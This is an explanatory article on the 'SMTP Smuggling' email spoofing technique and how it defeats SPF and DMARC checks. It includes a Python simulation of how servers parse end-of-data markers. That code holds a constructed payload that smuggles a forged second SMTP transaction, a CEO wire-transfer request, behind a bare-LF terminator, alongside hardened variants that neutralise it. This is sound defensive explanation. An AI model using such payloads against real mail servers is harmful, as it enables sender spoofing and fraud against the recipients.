Security researcher Timo Longin of SEC Consult has published a new attack technique called “SMTP Smuggling”. It lets an attacker send spoofed emails that appear to come from other users of an affected mail provider while still passing the checks that are supposed to verify the sender.
SMTP, the Simple Mail Transfer Protocol, is the standard protocol for transmitting email on the internet. It defines how a mail client hands a message to a server and how servers relay messages to one another.
According to the researchers, the problem lies in differences in how an outbound (sending) SMTP server and an inbound (receiving) SMTP server interpret the sequence that marks the end of the message data. The standard terminator is <CR><LF>.<CR><LF>, but some servers also accept variants in which the dot is framed by a bare <LF> or <CR>. If the outbound server forwards such a variant unchanged and the inbound server treats it as the end of the data, everything the attacker placed after it is parsed as a second SMTP transaction: a second envelope and a second message. That smuggled message is delivered from the provider's own outbound servers, so it passes SPF and, through SPF alignment, DMARC, even though the attacker never controlled the address in its From header; the missing DKIM signature does not cause a rejection, because DMARC needs only one aligned check to pass.
SPF, DKIM, and DMARC are mechanisms for verifying that an email really comes from the domain it claims and for combating spam and phishing. SPF checks whether the IP address of the sending server is authorised for the envelope sender's domain, DKIM verifies a cryptographic signature over the message headers and body, and DMARC ties both results to the domain in the From header and tells the receiver what to do when neither check passes. SMTP Smuggling sidesteps them because the smuggled message genuinely leaves an authorised server of the impersonated domain.
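The parsing difference described above, modelled as an added example (this is not code from the SEC Consult report; the hostnames, addresses and the exact terminator variants are assumptions). It shows an outbound relay that dot-stuffs only on <CR><LF> boundaries, an inbound parser that accepts a bare-<LF> end-of-data marker, and how the same payload splits into two messages on the lenient receiver, stays one message on a strict receiver, and is neutralised when the relay normalises line endings before dot-stuffing:

```python
"""Model of the SMTP Smuggling parsing difference (added illustration, not
code from the SEC Consult report). Hostnames and addresses are made up."""
import re

CRLF = b"\r\n"

# End-of-data markers. RFC 5321 requires <CRLF>.<CRLF>; the lenient pattern
# assumes a receiver that also accepts the dot framed by a bare LF or CR.
STRICT_EOD = re.compile(rb"\r\n\.\r\n")
LENIENT_EOD = re.compile(rb"(?:\r\n|\n|\r)\.(?:\r\n|\n|\r)")


def relay_outbound(client_data: bytes) -> bytes:
    """Outbound server: dot-stuff per CRLF line, append the real terminator.
    A bare LF inside a line is forwarded untouched, so a '.' that follows
    a bare LF is never stuffed and reaches the receiver as sent."""
    lines = client_data.split(CRLF)
    stuffed = [b"." + ln if ln.startswith(b".") else ln for ln in lines]
    return CRLF.join(stuffed) + CRLF + b"." + CRLF


def relay_outbound_hardened(client_data: bytes) -> bytes:
    """Same relay, but lone CR or lone LF is normalised to CRLF first, so
    dot-stuffing sees every line break a lenient receiver might see."""
    normalised = re.sub(rb"\r\n|\r|\n", CRLF, client_data)
    return relay_outbound(normalised)


def unstuff(body: bytes) -> bytes:
    """Receiver side of dot-stuffing: drop one leading dot per line."""
    return CRLF.join(ln[1:] if ln.startswith(b".") else ln
                     for ln in body.split(CRLF))


def inbound_session(stream: bytes, eod: re.Pattern, envelope: dict) -> list:
    """Inbound server that is already in DATA state for `envelope`.
    Returns the messages it would accept; bytes after an end-of-data marker
    are parsed as new SMTP commands (MAIL FROM, RCPT TO, DATA, QUIT)."""
    messages, env, pos, in_data = [], dict(envelope), 0, True
    while pos < len(stream):
        if in_data:
            m = eod.search(stream, pos)
            if m is None:  # unterminated data: a real server keeps waiting
                break
            messages.append({**env, "body": unstuff(stream[pos:m.start()])})
            pos, in_data, env = m.end(), False, {}
        else:
            end = stream.find(CRLF, pos)
            if end == -1:
                break
            line, pos = stream[pos:end], end + len(CRLF)
            verb = line.upper()
            if verb.startswith(b"MAIL FROM:"):
                env["mail_from"] = line[len(b"MAIL FROM:"):].strip().decode()
            elif verb.startswith(b"RCPT TO:"):
                env["rcpt_to"] = line[len(b"RCPT TO:"):].strip().decode()
            elif verb == b"DATA":
                in_data = True
            elif verb == b"QUIT":
                break
    return messages


# Constructed attacker payload: what the attacker's client sends after DATA,
# minus its own final <CRLF>.<CRLF> (which the outbound server consumes and
# replaces). The bare-LF terminator "\n.\r\n" is the smuggling point;
# everything after it is a second, forged SMTP transaction.
ATTACKER_DATA = (
    b"From: attacker@victim.example\r\n"
    b"To: target@receiver.example\r\n"
    b"Subject: hello\r\n\r\n"
    b"innocuous text\n.\r\n"
    b"MAIL FROM:<ceo@victim.example>\r\n"
    b"RCPT TO:<target@receiver.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@victim.example\r\n"
    b"To: target@receiver.example\r\n"
    b"Subject: Urgent wire transfer\r\n\r\n"
    b"Please pay the attached invoice."
)
FIRST_ENVELOPE = {"mail_from": "<attacker@victim.example>",
                  "rcpt_to": "<target@receiver.example>"}


def run(relay, eod) -> list:
    """Push the payload through `relay` and parse it with a receiver using `eod`."""
    return inbound_session(relay(ATTACKER_DATA), eod, FIRST_ENVELOPE)


if __name__ == "__main__":
    for name, relay, eod in [
        ("permissive relay, lenient receiver", relay_outbound, LENIENT_EOD),
        ("permissive relay, strict receiver", relay_outbound, STRICT_EOD),
        ("hardened relay, lenient receiver", relay_outbound_hardened, LENIENT_EOD),
    ]:
        msgs = run(relay, eod)
        print(f"{name}: {len(msgs)} message(s);",
              "envelopes:", [m["mail_from"] for m in msgs])
```

Only the first combination yields two messages; the second one carries MAIL FROM:<ceo@victim.example>, arrives from the provider's own relay, and therefore passes SPF. A strict receiver keeps the whole payload as the body of a single message, and a relay that normalises bare line endings before dot-stuffing turns the smuggled terminator into a harmless, dot-stuffed body line.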
The problem affects millions of domains, including those of Microsoft, Amazon, PayPal, eBay and GitHub, as well as the Outlook and Office 365 services. In their report, the researchers demonstrated sending emails that appeared to come from other people's addresses.
For more information on the SMTP Smuggling attack, refer to the researchers' full report.